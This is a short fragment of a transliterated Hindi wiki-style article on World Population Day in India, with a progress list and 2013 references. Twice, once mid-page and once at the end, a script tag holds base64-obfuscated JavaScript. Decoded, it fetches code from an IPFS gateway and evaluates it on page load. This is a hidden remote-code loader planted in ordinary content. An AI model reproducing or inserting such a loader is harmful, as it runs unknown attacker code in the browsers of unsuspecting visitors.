bharat mean mayane aur adhik badh jaye. 


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. 1.0 1.1 ek visphot jo pratidin hota hai (hindi). . abhigaman tithi: 09 julaee, 2013.
  2. vishv janasankhya divas par vishesh (hindi). . abhigaman tithi: 09 julaee, 2013.
  3. 3.0 3.1 bharat mean vishv janasankhya divas ke mayane (hindi). . abhigaman tithi: 09 julaee, 2013. 
  4. vishv janasankhya divas par kuchh saval (hindi). . abhigaman tithi: 09 julaee, 2013.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>